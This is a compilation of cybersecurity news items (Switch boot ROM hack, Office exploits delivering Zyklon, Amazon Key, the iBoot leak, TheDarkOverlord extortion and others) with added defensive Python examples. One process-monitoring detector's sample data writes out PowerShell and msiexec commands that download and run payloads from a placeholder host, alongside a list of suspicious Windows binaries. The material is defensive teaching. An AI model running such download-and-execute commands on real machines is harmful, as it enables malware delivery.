
Hackers run Linux on Nintendo Switch

Last week, hacker group fail0verflow shared a photo on Twitter, showing that they had managed to run Linux on the Nintendo Switch.


This tweet followed an earlier one in January in which they explained that their Switch coldboot exploit relies on a bug in the boot ROM: the very first code the console's processor runs at power-on, stored in read-only memory inside the chip.

They also stated that the flaw cannot be fixed by a software update on Switches already manufactured, because boot ROM code is fixed in silicon; only units built with a corrected ROM would be immune.


Earlier, they had also tweeted a demo-style text scroller running on the Switch.

While they have teased the exploit publicly, it may be a while before fail0verflow release the details and code for their hack, as was the case with the PS4 exploit that they demonstrated in 2016 and only documented over a year later.

Meanwhile, the Switch hacking community continues to make progress. After the 34C3 conference talk that laid the console's security architecture open, it looks likely to become easier for hackers to create homebrew software for the Switch and even to pirate games, which could mean serious financial repercussions for Nintendo.

For those with the technical knowledge who prefer the white-hat route, however, Nintendo is still offering bounties for vulnerability reports.


Axis Bank ATM in Kanpur dispenses fake Rs 500 note

An ATM belonging to Axis Bank in Kanpur district of Uttar Pradesh dispensed fake currency notes when two men attempted to withdraw money from it, news agency ANI reported.

When the men tried withdrawing Rs 10,000 and Rs 20,000 respectively, both of them got one fake note each with 'Children Bank of India' printed on it, instead of 'Reserve Bank of India'. The notes were purported to be of the denomination of Rs 500.

One of the persons who received a fake note from the ATM, Sachin, said that they complained about the incident to the ATM guard, who noted it down in his register.
“I came to withdraw Rs 10,000. One of the notes dispensed had ‘Children Bank’ printed on it. We complained to the ATM guard who noted it down in his register. We are being told that the action will be taken and our notes would be changed on Monday,” Sachin, a victim, was quoted as saying to news agency ANI.

Once the police were informed, the faulty ATM, located at Marble Market, was shut down and an investigation is underway.

“We came to know that two people had withdrawn Rs 20,000 and Rs 10,000 from the said ATM. They received 1 note each of Rs 500 with Children Bank printed on that. The ATM has been shut down. The investigation is underway,” SP South Kanpur said.

The incident was reminiscent of the days just after demonetisation, when many such instances came to light in different cities.

Advancing Ransomware Attacks and Creation of New Cyber Security Strategies

As ransomware is on the rise, organisations focus too heavily on anti-virus software rather than proactively forming strategies to deal with attacks that pose an ongoing threat to users. One sound piece of advice is to air-gap backups: keeping a copy of critical data on storage that is not reachable from the production network (offline media included) means that when ransomware strikes, data can be restored with little or no downtime.

But organisations more often than not find themselves taking one step forward and one step back. Ransomware has traditionally gone after backup programs and their associated storage, and it keeps targeting the storage subsystems themselves, which has pushed organisations into having robust backup procedures in place to recover if an attack gets through.

To be proactive, organisations should adopt ways of protecting data that allow it to be recovered readily whenever ransomware, or some other security incident, threatens to disrupt day-to-day business operations.

Clive Longbottom, client services director at analyst firm Quocirca explains: “If your backup software can see the back-up, so can the ransomware. Therefore, it is a waste of time arguing about on-site v off-site – it comes down to how well air locked the source and target data locations are.”

Defending against any attack requires several layers of defence, which may include a firewall, anti-virus software and backups. The last layer the user falls back on must be the most robust of all, to stop costly disruption before it is too late. Anti-virus software must still play a key defensive role, but it cannot be the only one.

A ransomware attack is pretty brutal, warns Longbottom: “It requires a lot of CPU and disk activity. It should be possible for a system to pick up this type of activity and either block it completely, throttle it, or prevent it from accessing any storage system other than ones that are directly connected physically to the system.”
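Longbottom's point that encryption in progress is visible as a burst of CPU and disk activity can be turned into a concrete check. The following is an added example, not code from the article or from Quocirca: a small detector that replays file-write events and raises an alert when many distinct files are rewritten with near-random content inside a short window, which is the signature of bulk encryption. The thresholds, event layout and sample workload are assumptions; a real endpoint agent would receive these events from a file-system filter driver rather than from a list.

```python
import math
import random
from collections import deque
from typing import List, Optional, Tuple

WINDOW_SECONDS = 10.0   # assumption: judge writes seen in the last 10 s
MIN_FILES = 20          # assumption: alert once this many distinct files...
MIN_ENTROPY = 7.5       # ...have been rewritten with near-random bytes (maximum is 8.0)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte. Text sits around 4-5; encrypted or compressed data approaches 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


class RansomwareDetector:
    """Sliding window over file writes: flags a burst of high-entropy rewrites to many files."""

    def __init__(self, window: float = WINDOW_SECONDS, min_files: int = MIN_FILES,
                 min_entropy: float = MIN_ENTROPY) -> None:
        self.window = window
        self.min_files = min_files
        self.min_entropy = min_entropy
        self.suspicious: deque = deque()   # (timestamp, path) of high-entropy writes only

    def observe(self, ts: float, path: str, sample: bytes) -> bool:
        """Feed one write (timestamp, path, first bytes written). True when the window trips."""
        if shannon_entropy(sample) >= self.min_entropy:
            self.suspicious.append((ts, path))
        while self.suspicious and ts - self.suspicious[0][0] > self.window:
            self.suspicious.popleft()
        return len({p for _, p in self.suspicious}) >= self.min_files


def first_alert(events: List[Tuple[float, str, bytes]]) -> Optional[int]:
    """Replay events through a fresh detector; index of the first alert, or None."""
    det = RansomwareDetector()
    for i, (ts, path, sample) in enumerate(events):
        if det.observe(ts, path, sample):
            return i    # a real agent would throttle or block the writing process here
    return None


def constructed_events() -> List[Tuple[float, str, bytes]]:
    """Constructed workload: 30 ordinary document saves, then 40 files rewritten with random bytes."""
    rng = random.Random(1234)
    text = (b"Quarterly report: revenue grew 4% on the back of strong demand. " * 64)[:4096]
    normal = [(float(i), f"/srv/docs/report-{i}.docx", text) for i in range(30)]
    burst = [(30.0 + i * 0.1, f"/srv/docs/report-{i}.docx",
              bytes(rng.getrandbits(8) for _ in range(4096))) for i in range(40)]
    return normal + burst


if __name__ == "__main__":
    print("first alert at event index:", first_alert(constructed_events()))
```

The usual false positives are legitimate bulk operations that also write high-entropy data, such as compression or the backup job itself, so in practice a rule like this is paired with an allow-list of known processes and with canary files that nothing legitimate should ever touch.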

Taking the traditional approach, data centres are often sited close to each other to keep latency low, but the fact that they all too often sit within the same circle of disruption increases the financial, operational and reputational risks associated with downtime.

Therefore a few tips can help an organisation protect its data and recover from a ransomware attack:
• The more layers you can add, the better.
• Educate users.
• Update your back-up regularly: it can be the last layer of defence.
• Keep a copy off site, on tape or in the cloud, but don't leave the drawbridge down: the copy must not be writable with the same credentials the production systems use.
• Plan your backup process around your recovery requirement.

These measures will not stop every attack, but they make a clean recovery from one far more likely.

Hackers hacked servers of Olympic organizers during opening ceremony


The Olympic organizers' servers were hacked during the opening ceremony on Feb. 9; as a result, TVs at the main press centre malfunctioned.

According to the South Korean news agency Yonhap, the organizers briefly shut down their own servers, which temporarily took the official website of the 2018 Winter Olympic Games offline.

Investigations are still in progress, and little is known about the individual or individuals behind the attack. It is beyond doubt, however, that the Olympics are a prime target for hackers around the world.

In January alone, cybersecurity firm McAfee published a report disclosing several existing campaigns aimed at Olympic-affiliated organizations.

"With the upcoming Olympics, we expect to see an increase in cyber attacks using Olympics-related themes," the company explained in its report. "In similar past cases, the victims were targeted for their passwords and financial information. In this case, the adversary is targeting the organizations involved in the Winter Olympics by using several techniques to make it more tempting to open the weaponized document."

But cyber attacks on international events have become common.

Recently patched Office vulnerabilities exploited

Criminals are delivering the Zyklon malware by exploiting three recently patched weaknesses in Microsoft Office. Security researchers at FireEye reported that the campaign leveraging the relatively new Office exploits has been spotted in the wild, distributing advanced malware they describe as a full-featured backdoor.

The campaign exploits three recently disclosed weaknesses in Microsoft Office to run a PowerShell script on the target system, which in turn downloads the final payload. They are:

CVE-2017-8759: a remote code execution flaw in the .NET Framework's SOAP WSDL parser, triggered when the target is tricked into opening a specially crafted document.

CVE-2017-11882 (RCE vulnerability): a 17-year-old memory corruption flaw in the Equation Editor component (EQNEDT32.EXE), patched in November 2017. In this campaign, “upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object.”

Dynamic Data Exchange (DDE): not a bug but a legacy feature that can be abused. “Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution,” researchers wrote. “With the help of a PowerShell script, the next payload is downloaded.”
Separately, the same patched Office vulnerability (CVE-2017-11882) is being used to spread other malware, including FAREIT, Ursnif and the Loki information stealer, a keylogger that among other things harvests cryptocurrency wallet passwords.

What is unusual in this case is the delivery mechanism: the exploit abuses the Windows Installer service. Previous exploitation used the Windows executable mshta.exe to run a PowerShell script; this attack instead uses msiexec.exe, the Windows Installer, to retrieve and run the payload.

Methods such as wscript, PowerShell, mshta.exe and winword.exe spawning child processes are very common, and security software already monitors them for abuse by other malware, so switching to msiexec.exe is an attempt to slip past that monitoring.
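The chains described above all surface as unusual parent/child pairs in process-creation telemetry: an Office application spawning the Equation Editor (EQNEDT32.EXE, the component CVE-2017-11882 lives in), or Office or the Equation Editor spawning mshta.exe, msiexec.exe or powershell.exe. The following added example, which is not FireEye's or Trend Micro's code, scans constructed Sysmon-style process-creation records for those pairs and for msiexec.exe being handed a URL. Field names follow Sysmon event ID 1; the records, paths and URLs are constructed sample data.

```python
from typing import Dict, List, Optional, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# EQNEDT32.EXE is the Equation Editor binary that CVE-2017-11882 lives in.
EXPLOIT_HOSTS = OFFICE_APPS | {"eqnedt32.exe"}
# Script hosts and living-off-the-land binaries the campaigns above use, plus the usual suspects.
SUSPICIOUS_CHILDREN = {"powershell.exe", "mshta.exe", "msiexec.exe", "wscript.exe",
                       "cscript.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe",
                       "certutil.exe", "bitsadmin.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a detection label for one process-creation record, or None if it looks benign."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    cmd = event.get("CommandLine", "").lower()
    if parent in OFFICE_APPS and child == "eqnedt32.exe":
        # Opening an ordinary document never needs Equation Editor; CVE-2017-11882 starts here.
        return "office-spawned-equation-editor"
    if parent in EXPLOIT_HOSTS and child in SUSPICIOUS_CHILDREN:
        if child == "msiexec.exe" and ("http://" in cmd or "https://" in cmd):
            # Windows Installer fetching a remote package: the msiexec.exe technique described above.
            return "msiexec-remote-package"
        return f"{parent}-spawned-{child}"
    return None


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run every record through classify(); return (index, label) for each hit."""
    hits = []
    for i, ev in enumerate(events):
        label = classify(ev)
        if label:
            hits.append((i, label))
    return hits


def constructed_events() -> List[Dict[str, str]]:
    """Constructed records in the shape of Sysmon event ID 1 (sample data, not real telemetry)."""
    word = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
    eqn = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
    return [
        {"ParentImage": r"C:\Windows\explorer.exe", "Image": word,
         "CommandLine": '"WINWORD.EXE" invoice.doc'},                       # benign: user opens a doc
        {"ParentImage": word, "Image": eqn,
         "CommandLine": '"EQNEDT32.EXE" -Embedding'},                       # embedded OLE object
        {"ParentImage": eqn, "Image": r"C:\Windows\System32\mshta.exe",
         "CommandLine": "mshta.exe http://example.invalid/stage.hta"},      # older delivery route
        {"ParentImage": eqn, "Image": r"C:\Windows\System32\msiexec.exe",
         "CommandLine": "msiexec.exe /q /i http://example.invalid/stage.msi"},  # Windows Installer route
        {"ParentImage": word,
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell.exe -w hidden -nop -c IEX(New-Object Net.WebClient)"
                        ".DownloadString('http://example.invalid/p.ps1')"},  # DDE style
        {"ParentImage": r"C:\Windows\System32\services.exe",
         "Image": r"C:\Windows\System32\msiexec.exe",
         "CommandLine": "msiexec.exe /V"},                                  # benign: installer service
    ]


if __name__ == "__main__":
    for index, label in scan(constructed_events()):
        print(index, label)
```

Because defenders already watch mshta.exe and PowerShell, the msiexec.exe variant is the one worth adding: Windows Installer accepting a remote package is rarely legitimate from an Office or Equation Editor parent, whereas the same binary launched by services.exe (the last record) is routine and must not alert.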

Zyklon is a full-featured backdoor, first observed in the wild in early 2016, that offers attackers a number of sophisticated capabilities; its operators primarily target telecommunications, insurance and financial services. The malware can:

• Log keystrokes
• Harvest passwords
• Download and execute additional plugins
• Conduct distributed denial-of-service (DDoS) attacks
• Mine cryptocurrency
• Update and remove itself

Amazon denies risk in Amazon Key — while it is working to fix it

Earlier this week, an anonymous researcher who goes by MG on Twitter posted a video showing how Amazon Key, the company's recently launched service that lets delivery staff unlock a customer's door and leave packages inside when no one is home, can be used, with the help of software, to disable the customer's alarm system and break into the home.


After a failed attempt at disclosure to Amazon, which demanded a proof of concept and ruled out any reward or payment, MG took to Twitter and uploaded the video, showing how Amazon Key can be exploited by “anyone with a Raspberry Pi.”

Once the video was posted, Amazon finally reached out to him and is now working on a fix for the vulnerability.

However, Amazon is still denying any risk associated with its product.

"The security features built into the delivery application technology used for in-home delivery are not being used in the demonstration,” said Kristen Kish, Amazon spokesperson.

She added that, “Safeguards are in place when the driver technology is used: our system monitors 1) that the door is only open for a brief period of time, 2) communication to the camera and lock is not interrupted, and 3) that the door is securely re-locked. The driver does not leave without physically checking that the door is locked. Safety and security is built into every aspect of the service.”

While MG is withholding technical details until Amazon has had a chance to fix the issue, the video shows how easily a hacker can enter a house fitted with Amazon Key.

Amazon also told Forbes that the hack involves “disrupting Wi-Fi connections used by the Key system, not Amazon software. The Raspberry Pi does some as yet undisclosed deauthorization, which would indicate a disconnection between the various pieces of the Amazon Key setup.”

MG, in his write-up, questions this process.

“Why are you using low wage workers to be the last gate in a bad security model? How often has this process been audited for completion rates or holes?” he writes.

He is also concerned by the “fact that they require your house's alarm to be turned off for a driver to use the Amazon Key without issue,” and notes that Amazon does not address consumer use of the app either.
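Amazon's safeguards above amount to three invariants over one delivery session: the door is open only briefly, the camera and lock stay reachable throughout, and the door is confirmed locked at the end. The security-relevant question is what the system does when the second invariant cannot be established, which is precisely what a Wi-Fi disruption causes. The following added example, not Amazon's code, evaluates a constructed session timeline fail-closed: a gap in either device's heartbeats marks the session unverified even if the lock later reports itself locked. Event names, thresholds and the timelines are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

MAX_OPEN_SECONDS = 60.0     # assumption: the door may stand open this long at most
MAX_HEARTBEAT_GAP = 5.0     # assumption: camera and lock must each check in at least every 5 s


@dataclass(frozen=True)
class Event:
    t: float     # seconds since the delivery session began
    kind: str    # unlock | door_open | door_closed | lock | camera_heartbeat | lock_heartbeat


def evaluate_session(events: List[Event], max_open: float = MAX_OPEN_SECONDS,
                     max_gap: float = MAX_HEARTBEAT_GAP) -> Tuple[str, List[str]]:
    """Fail-closed verdict: 'verified' only if every monitored property held for the whole session."""
    reasons: List[str] = []
    unlock_t = None
    opened_t = None
    locked = False
    last_beat: Dict[str, float] = {}
    for e in sorted(events, key=lambda ev: ev.t):
        if e.kind == "unlock":
            unlock_t = e.t
            last_beat = {"camera": e.t, "lock": e.t}   # both links were live to issue the unlock
        elif unlock_t is None:
            continue                                    # nothing to judge before the session starts
        elif e.kind in ("camera_heartbeat", "lock_heartbeat"):
            device = e.kind.split("_")[0]
            gap = e.t - last_beat[device]
            if gap > max_gap:
                # A silent link is not "no news": it is exactly what a Wi-Fi disruption produces.
                reasons.append(f"{device} link silent for {gap:.0f}s from t={last_beat[device]:.0f}")
            last_beat[device] = e.t
        elif e.kind == "door_open":
            opened_t = e.t
        elif e.kind == "door_closed":
            if opened_t is not None and e.t - opened_t > max_open:
                reasons.append(f"door open for {e.t - opened_t:.0f}s")
            opened_t = None
        elif e.kind == "lock":
            locked = True
            for device, t in last_beat.items():
                if e.t - t > max_gap:
                    reasons.append(f"{device} link silent for {e.t - t:.0f}s at relock")
    if unlock_t is None:
        reasons.append("no unlock event")
    if not locked:
        reasons.append("no relock confirmation")
    if opened_t is not None:
        reasons.append("door never reported closed")
    return ("verified" if not reasons else "unverified", reasons)


def heartbeats(times) -> List[Event]:
    """Both devices reporting at each of the given times."""
    return [Event(float(t), kind) for t in times for kind in ("camera_heartbeat", "lock_heartbeat")]


def normal_delivery() -> List[Event]:
    """Constructed timeline: unlock, door open for 12 s, relock, both links reporting every 2 s."""
    return [Event(0, "unlock"), Event(3, "door_open"), Event(15, "door_closed"),
            Event(21, "lock")] + heartbeats(range(2, 21, 2))


def disrupted_delivery() -> List[Event]:
    """Same delivery, but both links fall silent from t=4 to t=40, as a deauthentication burst would cause."""
    return [Event(0, "unlock"), Event(3, "door_open"), Event(41, "door_closed"),
            Event(43, "lock")] + heartbeats([2, 4, 40, 42])


if __name__ == "__main__":
    print(evaluate_session(normal_delivery()))
    print(evaluate_session(disrupted_delivery()))
```

The point of the second timeline is that every explicit check passes (door open under the limit, relock confirmed) and only the gap rule catches it; a system that treats missing telemetry as "no problem" would accept that session, and the driver at the door is then the only remaining control, which is MG's objection.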

'Hide and Seek' botnet attack could hit India

A malicious cyber threat, the “Hide and Seek” (HNS) botnet, is looming over India after affecting major countries across the globe.

Bitdefender, a Romanian cybersecurity and anti-virus company, has said that the HNS botnet could hit the country very hard and affect millions of users.

"A malicious cyber threat in the shape of HNS botnet now hovers above the ginormous cyber network of India. While the world still healing from the scars of ransomware cyber-attack, we cannot afford to conjure any other of such attack with such tiny or no information -- additionally more threatening and effective," Zakir Hussain, Director, BD soft, Bitdefender, told IANS.

Globally the botnet controlled more than 32,000 Internet of Things (IoT) devices (32,312 at the time of Bitdefender's count), and it appears to be under active development.

"This menace being hardly traceable, can hit India a severe blow. Though the latest technology adopted by the governmental departments of India is sophisticated and safeguarded, 'prevention is always better than cure'," Hussain added.

"When the world is still in a rivalry to 'Hide and Seek', India can be one of the countries on the list and must be prepared," he added.

On January 10, security researchers at Bitdefender Labs spotted an emerging botnet that uses custom-built peer-to-peer communication to coordinate its bots instead of a central command server.

"The HNS botnet communicates in a complex and decentralized manner and uses multiple anti-tampering techniques to prevent a third party from hijacking/poisoning it. The bot can perform web exploitation against a series of devices," Bitdefender researchers wrote in a blog post.

Once the botnet has infected a device, the hackers behind it can issue commands over that peer-to-peer network to control it.

Google faces fine in India over abuse of dominance

Even before it was fined by the European Commission, Google had felt the heat of a set of complaints in India over abuse of its dominant position, and a regulatory body has now ordered the search giant to pay a fine.

The complaints against the global tech titan, which left rivals in dire straits, were five years old when the Competition Commission of India (CCI) levied the fine.

In 2012 Bharat Matrimony first pointed an accusing finger at the search engine, followed by a consumer protection group with allegations of the same nature.

After a thorough probe, the CCI upheld the five-year-old complaints and ordered the company to pay a fine for abusing its dominance. The commission observed that bias in Google's search results had left rival businesses high and dry.

Google, however, said it is devising new mechanisms to live up to users' expectations.

The search engine is now unable to escape a fine amounting to 5% of what it earns in a year in the country, a sum that hardly matters to a company of its size.

Notably, Google had to pay $2.7bn (£2.1bn) to the European Commission last year for allegedly favouring its own shopping service in search results.

How source code leak put Apple in trouble

What makes iOS and the iPhone easier for hackers to attack? Consider how key iPhone source code came to be posted on GitHub.

Security experts explain that iBoot, the component whose source was posted on GitHub, is the bootloader: the first software to run when the iPhone is switched on, which brings up the rest of the operating system. It plays a role similar to a PC's BIOS, and in particular it checks that the code it is about to run is signed by Apple before executing it.

The story concerns a major leak: the source of iBoot, one of the most security-critical parts of iOS, turned up in a GitHub repository. Apple has historically been reluctant to put such code in the public domain; after months of will-it-won't-it, only a few selected parts of iOS and macOS have been opened up. In the same breath, Apple has taken a slew of measures to protect the integrity of iBoot.

There was a flutter at Apple when the iBoot source was found posted anonymously on GitHub. Researchers who examined the code consider it genuine, while the origin of the leak remains unknown. Apple initially kept a studied silence, but it effectively admitted the code was real by sending GitHub a copyright (DMCA) takedown notice asking it to remove the repository, which GitHub did.

According to another security expert, access to the iBoot code lets researchers, and attackers, study it for vulnerabilities, and flaws at this level of the boot chain could make it easier to crack the entire system.

Earlier versions of iBoot gave attackers a route to bypass the lock screen and decrypt the device's data, which is why newer iPhones ship with a dedicated security chip to protect the phone.

That more advanced design has made it much harder for attackers to bring working exploits for iOS devices to market, and it leaves even many security researchers stumped. As a result, bugs in iOS have become much harder to unearth.
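Both the Switch coldboot story above and the iBoot leak turn on the same structure: an immutable boot ROM that holds a root of trust and verifies the next, updatable stage before running it. The following is an added example, not code from fail0verflow, Nintendo or Apple: a toy chain in which the ROM pins only the hash of the vendor's public key and refuses to hand over control unless the bootloader image carries that key and a valid signature over its payload. Hash-based Lamport one-time signatures stand in for the RSA or ECDSA a real bootloader uses, so that the example needs only the standard library; key sizes, image layout and error strings are assumptions.

```python
import hashlib
import os
from typing import Callable, Dict, List, Tuple

Key = List[Tuple[bytes, bytes]]   # 256 pairs, one pair per bit of the message digest


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def _digest_bits(msg: bytes):
    d = sha256(msg)
    for i in range(256):
        yield (d[i // 8] >> (7 - i % 8)) & 1


def lamport_keygen(rng: Callable[[int], bytes] = os.urandom) -> Tuple[Key, Key]:
    """Lamport one-time keys: the secret is 512 random strings, the public key is their hashes."""
    sk = [(rng(32), rng(32)) for _ in range(256)]
    pk = [(sha256(a), sha256(b)) for a, b in sk]
    return sk, pk


def lamport_sign(sk: Key, msg: bytes) -> bytes:
    """Reveal, for each digest bit, the secret string for that bit. One key signs one message only."""
    return b"".join(sk[i][bit] for i, bit in enumerate(_digest_bits(msg)))


def lamport_verify(pk: Key, msg: bytes, sig: bytes) -> bool:
    """Each revealed string must hash to the public-key entry selected by the same digest bit."""
    if len(sig) != 256 * 32:
        return False
    return all(sha256(sig[32 * i:32 * i + 32]) == pk[i][bit]
               for i, bit in enumerate(_digest_bits(msg)))


def serialize_pk(pk: Key) -> bytes:
    return b"".join(a + b for a, b in pk)


def parse_pk(blob: bytes) -> Key:
    return [(blob[64 * i:64 * i + 32], blob[64 * i + 32:64 * i + 64]) for i in range(256)]


class BootRom:
    """Immutable first stage. Only a hash of the vendor's public key is burned in, so the vendor can
    sign new bootloaders forever, but the ROM's own checking code can never be changed in the field."""

    def __init__(self, vendor_key_hash: bytes) -> None:
        self.vendor_key_hash = vendor_key_hash

    def load(self, image: Dict[str, bytes]) -> bytes:
        if sha256(image["pubkey"]) != self.vendor_key_hash:
            raise RuntimeError("halt: public key is not the vendor's")
        if not lamport_verify(parse_pk(image["pubkey"]), image["payload"], image["signature"]):
            raise RuntimeError("halt: bootloader signature invalid")
        return image["payload"]        # only now would control be transferred to the next stage


def build_image(sk: Key, pk: Key, payload: bytes) -> Dict[str, bytes]:
    """What the vendor's signing service produces: the next stage, its signature and the signing key."""
    return {"pubkey": serialize_pk(pk), "payload": payload, "signature": lamport_sign(sk, payload)}


def try_boot(rom: BootRom, image: Dict[str, bytes]) -> Tuple[bool, str]:
    """Boot outcome as (accepted, payload-or-reason), so callers need not catch the halt."""
    try:
        return True, rom.load(image).decode()
    except RuntimeError as err:
        return False, str(err)


if __name__ == "__main__":
    vendor_sk, vendor_pk = lamport_keygen()
    rom = BootRom(sha256(serialize_pk(vendor_pk)))          # burned in at manufacture
    genuine = build_image(vendor_sk, vendor_pk, b"second-stage bootloader v1")
    print(try_boot(rom, genuine))
    print(try_boot(rom, dict(genuine, payload=b"second-stage bootloader v1 + patch")))
    attacker_sk, attacker_pk = lamport_keygen()
    print(try_boot(rom, build_image(attacker_sk, attacker_pk, b"second-stage bootloader v1")))
```

Two properties of the design follow directly. Because the ROM pins a key rather than a payload hash, the vendor can ship new second-stage code (Apple updates iBoot; Nintendo updates its bootloader), but a defect in the ROM's own load logic is permanent for every unit already shipped, which is why fail0verflow can say the Switch flaw is unpatchable. And a leaked copy of the second stage's source, as with iBoot, does not by itself defeat the check: forging a signature still requires the private key, and the leak's value lies in finding bugs in what that signed code does once it is trusted.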


Consumer Reports: Smart TVs Vulnerable to Hacking

Millions of smart TVs and other streaming devices could be easily exploited by cybercriminals as they have several security vulnerabilities.

In an extensive investigation, Consumer Reports, a non-profit organization that publishes a magazine and a website, found that the security of connected viewing devices and the user privacy policies of top manufacturers were not up to the mark.

Consumer Reports analyzed smart TVs from five big U.S. TV brands — Samsung, LG, Sony, TCL and Vizio — and found several problems.

Samsung’s smart TVs and Roku’s smart-TV platform were the worst affected, with flaws that let a hacker on the same network change the channel, raise the volume or (worst of all) play arbitrary YouTube videos.

"We found that a relatively unsophisticated hacker could change channels, play offensive content, or crank up the volume, which might be deeply unsettling to someone who didn’t understand what was happening," Glenn Derene, Consumer Reports' senior director of content.

However, Roku hit back hard in a blog post entitled “Consumer Reports Got It Wrong”, assuring its customers that there is no security risk.

"Roku enables third-party developers to create remote control applications that consumers can use to control their Roku products. This is achieved through the use of an open interface that Roku designed and published. There is no security risk to our customers’ accounts or the Roku platform with the use of this API. In addition, consumers can turn off this feature on their Roku player or Roku TV by going to Settings>System>Advanced System Settings>External Control>Disabled," said Gary Ellison,  Roku's vice president.

Meanwhile, a Samsung spokesperson told Consumer Reports that the company is investigating the problem and expects to release a software update this year that would also address related issues.







Hacker Group threatens students and schools

According to a warning issued on 31 January by the FBI's Cyber Division and the Department of Education's Office of the Inspector General, a hacker group calling itself “TheDarkOverlord” (TDO) has tried to sell over 100 million private records and, as of January, is responsible for over 69 attacks on schools and other businesses.

TDO is also allegedly responsible for the release of over 200,000 records, including the PII of over 7,000 students, after victims failed to pay ransoms.

The warning describes the group as “a loosely affiliated group of highly trained hackers” who, since April 2016, have “conducted various extortion schemes with a recent focus on the public school system.”

The warning says that TDO uses remote access tools to breach school district networks and steal sensitive data, which it then uses to extort money from its victims, including students.

According to the report, TDO has also threatened violence in case of failure to meet demands.

Initially, TDO communicated their demands via email with threats of publicly releasing stolen data, but the warning notes that in September 2017, “TDO escalated its tactics by threatening school shootings through text messages and emails directed at students, staff, and local law enforcement officials.”

This caused several schools to close for a few days as a precaution.

TDO was allegedly connected to multiple threats of violence on school campuses; the report says that while these threats caused panic, they “provided TDO with no apparent monetary gain.”

In a recent incident, TDO threatened to publicize the sensitive behavioral reports and private health information of students.

The FBI also recommends that victims not give in to ransom demands, as paying does not guarantee the return of sensitive data. Instead, it advises victims to contact law enforcement, retain the original emails as evidence, and maintain a timeline of the attack if possible.